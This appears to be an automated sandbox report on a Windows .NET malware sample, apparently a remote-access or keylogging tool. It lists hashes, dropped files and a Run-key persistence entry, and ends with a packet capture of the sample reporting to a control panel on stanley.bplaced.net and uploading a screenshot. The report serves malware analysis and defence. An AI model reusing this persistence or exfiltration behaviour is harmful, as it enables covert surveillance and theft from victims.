Analysis Date2016-02-06 13:19:10
MD544a1a8c29fcdd0dd3c01cdbd6441881b
SHA1aa9d38eca69bd0f50582fa5e3c5da0afa4995d74

Static Details:

File typePE32 executable for MS Windows (GUI) Intel 80386 32-bit Mono/.Net assembly
Section.text md5: 61405545b9d6a514b8bef37167e18367 sha1: 9b2b15f9aa288a968981cff2b805d9ca9d9749a4 size: 958464
Section.data md5: sha1: size:
Section.xcpad md5: sha1: size:
Section.idata md5: sha1: size:
Section.reloc md5: ba4f2c1dcc167d3c9393cbea468f46fa sha1: eb1baf173094fa52ae6b2a48d2c0efc6962e676a size: 4096
Section.rsrc md5: 927c04f685e8039af6d2f6cb9660b496 sha1: c25a1f8ea18c24de97ced325ed350b2d912dadda size: 4096
Timestamp
VersionLegalCopyright:
PackagerVersion:
InternalName:
FileVersion:
CompanyName:
Comments:
ProductName:
ProductVersion:
FileDescription:
Packager:
OriginalFilename:
Packer
PEhash
IMPhashf34d5f2d4577ed6d9ceec516c1f5a744
AVAd-AwareError Scanning File
AVAlwil (avast)Error Scanning File
AVArcabit (arcavir)Error Scanning File
AVAuthentiumError Scanning File
AVAvira (antivir)Error Scanning File
AVBitDefenderError Scanning File
AVBullGuardError Scanning File
AVCA (E-Trust Ino)Error Scanning File
AVCAT (quickheal)Error Scanning File
AVClamAVError Scanning File
AVDr. WebError Scanning File
AVEmsisoftError Scanning File
AVEset (nod32)Error Scanning File
AVF-SecureError Scanning File
AVFortinetError Scanning File
AVFrisk (f-prot)Error Scanning File
AVGrisoft (avg)Error Scanning File
AVIkarusError Scanning File
AVK7Error Scanning File
AVKasperskyError Scanning File
AVMalwareBytesError Scanning File
AVMcafeeError Scanning File
AVMicroWorld (escan)Error Scanning File
AVMicrosoft Security EssentialsError Scanning File
AVRisingError Scanning File
AVSymantecError Scanning File
AVTrend MicroError Scanning File
AVTwisterError Scanning File
AVVirusBlokAda (vba32)Error Scanning File
AVZillya!Error Scanning File

Runtime Details:

Screenshot

Process
↳ C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe

Creates Mutex
Creates Mutex
Creates Mutexf2687dfa-76ea-4e42-bac6-798b678e233d
Creates Mutexeed3bd3a-a1ad-4e99-987b-d7cb3fcfa7f0 - S-1-5-21-3542270870-992954940-2626765878-1000
Creates Mutex
Creates MutexGlobal\.net clr networking
Creates MutexGlobal\.net clr networking
Creates FileC:\Windows\AppPatch\AcGenral.DLL
Creates FileC:\Windows\AppPatch\AcLayers.DLL
Creates FileC:\Windows\system32\l_intl.nls
Creates FileC:\Windows\assembly\pubpol4.dat
Creates FileC:\Users\Admin\AppData\Roaming\Imminent\Path.dat
Creates FileC:\Windows\system32\tzres.dll
Creates FileC:\Users\Admin\AppData\Roaming\Imminent\Logs\06-02-2016
Creates FileNsi
Creates FileC:\Users\Admin\AppData\Roaming\Imminent\Logs\06-02-2016
Creates FileC:\Users\Admin\AppData\Roaming\Imminent\Logs\06-02-2016
RegistryHKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\macrons ➝
C:\Users\Admin\AppData\Roaming\macrons\macrons.exe\\x00
RegistryHKEY_CURRENT_USER\Software\Microsoft\ActiveMovie\devenum\Version ➝
7

Process
↳ C:\Windows\System32\schtasks.exe

Creates Mutex
Creates FileC:\Users\Admin\AppData\Local\Temp\1547424608.xml

Process
↳ C:\aa9d38eca69bd0f50582fa5e3c5da0afa4995d74.exe

Creates Mutex
Creates Mutex
Creates Mutex
Creates MutexLocal\ZonesCounterMutex
Creates MutexLocal\ZoneAttributeCacheCounterMutex
Creates MutexLocal\ZonesCacheCounterMutex
Creates MutexLocal\ZoneAttributeCacheCounterMutex
Creates MutexLocal\ZonesLockedCacheCounterMutex
Creates FileC:\aa9d38eca69bd0f50582fa5e3c5da0afa4995d74.exe.config
Creates FileC:\aa9d38eca69bd0f50582fa5e3c5da0afa4995d74.exe
Creates FileC:\aa9d38eca69bd0f50582fa5e3c5da0afa4995d74.exe.config
Creates FileC:\Windows\system32\l_intl.nls
Creates FileC:\aa9d38eca69bd0f50582fa5e3c5da0afa4995d74.exe
Creates FileC:\Windows\assembly\pubpol4.dat
Creates FileC:\Users\Admin\AppData\Local\Temp\1547424608.xml
Creates FileC:\Users\Admin\AppData\Local\Microsoft\Windows\Caches\cversions.1.db
Creates FileC:\Users\Admin\AppData\Local\Microsoft\Windows\Caches\{AFBF9F1A-8EE8-4C77-AF34-C647E37CA0D9}.1.ver0x0000000000000009.db
Creates FileC:\Windows\System32\schtasks.exe
RegistryHKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet ➝
0
RegistryHKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect ➝
1
RegistryHKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet ➝
0
RegistryHKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect ➝
1

Process
↳ C:\Users\Admin\AppData\Local\Temp\RarSFX0\gVBchpp.exe

Creates Mutex
Creates Mutex
Creates Mutex
Creates FileC:\Users\Admin\AppData\Local\Temp\RarSFX0\gVBchpp.exe.config
Creates FileC:\Users\Admin\AppData\Local\Temp\RarSFX0\gVBchpp.exe
Creates FileC:\Users\Admin\AppData\Local\Temp\RarSFX0\gVBchpp.exe.config
Creates FileC:\Windows\system32\l_intl.nls
Creates FileC:\Users\Admin\AppData\Local\Temp\RarSFX0\gVBchpp.exe
Creates FileC:\Windows\assembly\pubpol4.dat
Creates FileC:\Users\Admin\AppData\Local\Temp\RarSFX0\JrVzWJrYnjUOghD.dat
Creates FileC:\Users\Admin\AppData\Local\Temp\RarSFX0\JrVzWJrYnjUOghD.dat

Process
↳ C:\aa9d38eca69bd0f50582fa5e3c5da0afa4995d74.exe

Creates FileC:\Users\Admin\AppData\Local\Temp\FB_3EC5.tmp
Creates FileC:\Users\Admin\AppData\Local\Temp\FB_3EC5.tmp.exe
Creates FileC:\Users\Admin\AppData\Local\Microsoft\Windows\Caches\cversions.1.db
Creates FileC:\Users\Admin\AppData\Local\Microsoft\Windows\Caches\{AFBF9F1A-8EE8-4C77-AF34-C647E37CA0D9}.1.ver0x0000000000000009.db
Creates FileC:\Users\Admin\AppData\Local\Temp\FB_3EC5.tmp.exe
Creates FileC:\Users\Admin\AppData\Local\Temp\FB_40F7.tmp
Creates FileC:\Users\Admin\AppData\Local\Temp\FB_40F7.tmp.exe
Creates FileC:\Users\Admin\AppData\Local\Temp\FB_40F7.tmp.exe
Creates Mutex
Creates MutexLocal\ZonesCounterMutex
Creates MutexLocal\ZoneAttributeCacheCounterMutex
Creates MutexLocal\ZonesCacheCounterMutex
Creates MutexLocal\ZoneAttributeCacheCounterMutex
Creates MutexLocal\ZonesLockedCacheCounterMutex
Creates Mutex
Creates MutexLocal\ZonesCounterMutex
Creates MutexLocal\ZoneAttributeCacheCounterMutex
Creates MutexLocal\ZonesCacheCounterMutex
Creates MutexLocal\ZoneAttributeCacheCounterMutex
Creates MutexLocal\ZonesLockedCacheCounterMutex
RegistryHKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet ➝
0
RegistryHKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect ➝
1
RegistryHKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet ➝
0
RegistryHKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect ➝
1
RegistryHKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet ➝
0
RegistryHKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect ➝
1
RegistryHKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet ➝
0
RegistryHKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect ➝
1

Process
↳ C:\Users\Admin\AppData\Local\Temp\FB_3EC5.tmp.exe

Creates Mutex
Creates Mutex
Creates MutexLocal\ZonesCounterMutex
Creates MutexLocal\ZoneAttributeCacheCounterMutex
Creates MutexLocal\ZonesCacheCounterMutex
Creates MutexLocal\ZoneAttributeCacheCounterMutex
Creates MutexLocal\ZonesLockedCacheCounterMutex
Creates Mutex
Creates FileC:\Users\Admin\AppData\Local\Temp\FB_3EC5.tmp.exe
Creates FileC:\Users\Admin\AppData\Local\Temp\FB_3EC5.tmp.exe
Creates File__tmp_rar_sfx_access_check_8432097
Creates FileC:\Users\Admin\AppData\Local\Temp\FB_3EC5.tmp.exe
Creates FilegVBchpp.exe
Creates FileJrVzWJrYnjUOghD.dat
Creates FileC:\Users\Admin\AppData\Local\Microsoft\Windows\Caches\cversions.1.db
Creates FileC:\Users\Admin\AppData\Local\Microsoft\Windows\Caches\{AFBF9F1A-8EE8-4C77-AF34-C647E37CA0D9}.1.ver0x0000000000000009.db
Creates FileC:\Users\Admin\AppData\Local\Temp\RarSFX0\gVBchpp.exe
Creates FileC:\Windows\AppPatch\pcamain.sdb
Creates FileC:\Users\Admin\AppData\Local\Temp\RarSFX0\gVBchpp.exe
Creates FileC:\Users\desktop.ini
Creates FileC:\
Creates File\SystemRoot\AppPatch\sysmain.sdb
Creates FileC:\Windows\system32\ntshrui.dll
Creates FileC:\Windows\system32\ntshrui.dll
Creates FileC:\Users\Admin\AppData\Local\Temp\RarSFX0
Creates FileC:\Users\Admin\AppData\Local\Temp\RarSFX0
Creates FileC:\Users\Admin\AppData\Local\Temp\RarSFX0
RegistryHKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet ➝
0
RegistryHKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect ➝
1
RegistryHKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet ➝
0
RegistryHKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect ➝
1

Process
↳ C:\Users\Admin\AppData\Local\Temp\FB_40F7.tmp.exe

Creates FileC:\Users\Admin\AppData\Local\Temp\FB_40F7.tmp.exe.config
Creates FileC:\Users\Admin\AppData\Local\Temp\FB_40F7.tmp.exe
Creates FileC:\Users\Admin\AppData\Local\Temp\FB_40F7.tmp.exe.config
Creates FileC:\Windows\system32\l_intl.nls
Creates FileC:\Users\Admin\AppData\Local\Temp\FB_40F7.tmp.exe
Creates FileC:\Windows\assembly\pubpol4.dat
Creates Mutex

Network Details:


Raw Pcap
0x00000000 (00000)   47455420 2f6c6976 65253230 61636365   GET /live%20acce
0x00000010 (00016)   73732f6b 6270616e 656c2f70 6f73742e   ss/kbpanel/post.
0x00000020 (00032)   7068703f 74797065 3d6e6f74 69666963   php?type=notific
0x00000030 (00048)   6174696f 6e266d61 6368696e 656e616d   ation&machinenam
0x00000040 (00064)   653d5043 266d6163 68696e65 74696d65   e=PC&machinetime
0x00000050 (00080)   3d313a32 38253230 504d2048 5454502f   =1:28%20PM HTTP/
0x00000060 (00096)   312e310d 0a486f73 743a2073 74616e6c   1.1..Host: stanl
0x00000070 (00112)   65792e62 706c6163 65642e6e 65740d0a   ey.bplaced.net..
0x00000080 (00128)   436f6e6e 65637469 6f6e3a20 4b656570   Connection: Keep
0x00000090 (00144)   2d416c69 76650d0a 0d0a504f 5354202f   -Alive....POST /
0x000000a0 (00160)   6c697665 25323061 63636573 732f6b62   live%20access/kb
0x000000b0 (00176)   70616e65 6c2f696d 6167652f 75706c6f   panel/image/uplo
0x000000c0 (00192)   61642e70 68702048 5454502f 312e310d   ad.php HTTP/1.1.
0x000000d0 (00208)   0a436f6e 74656e74 2d547970 653a206d   .Content-Type: m
0x000000e0 (00224)   756c7469 70617274 2f666f72 6d2d6461   ultipart/form-da
0x000000f0 (00240)   74613b20 626f756e 64617279 3d2d2d2d   ta; boundary=---
0x00000100 (00256)   2d2d2d2d 2d2d2d2d 2d2d2d2d 2d2d2d2d   ----------------
0x00000110 (00272)   2d2d3864 33326566 39373136 62656336   --8d32ef9716bec6
0x00000120 (00288)   320d0a48 6f73743a 20737461 6e6c6579   2..Host: stanley
0x00000130 (00304)   2e62706c 61636564 2e6e6574 0d0a436f   .bplaced.net..Co
0x00000140 (00320)   6e74656e 742d4c65 6e677468 3a203231   ntent-Length: 21
0x00000150 (00336)   3333340d 0a457870 6563743a 20313030   334..Expect: 100
0x00000160 (00352)   2d636f6e 74696e75 650d0a0d 0a2d2d2d   -continue....---
0x00000170 (00368)   2d2d2d2d 2d2d2d2d 2d2d2d2d 2d2d2d2d   ----------------
0x00000180 (00384)   2d2d2d2d 38643332 65663937 31366265   ----8d32ef9716be
0x00000190 (00400)   6336320d 0a436f6e 74656e74 2d446973   c62..Content-Dis
0x000001a0 (00416)   706f7369 74696f6e 3a20666f 726d2d64   position: form-d
0x000001b0 (00432)   6174613b 206e616d 653d2266 696c6522   ata; name="file"
0x000001c0 (00448)   3b206669 6c656e61 6d653d22 50435f32   ; filename="PC_2
0x000001d0 (00464)   5f365f31 335f3238 5f312e6a 7067220d   _6_13_28_1.jpg".
0x000001e0 (00480)   0a436f6e 74656e74 2d547970 653a2061   .Content-Type: a
0x000001f0 (00496)   70706c69 63617469 6f6e2f6f 63746574   pplication/octet
0x00000200 (00512)   2d737472 65616d0d 0a0d0aff d8ffe0     -stream........


Strings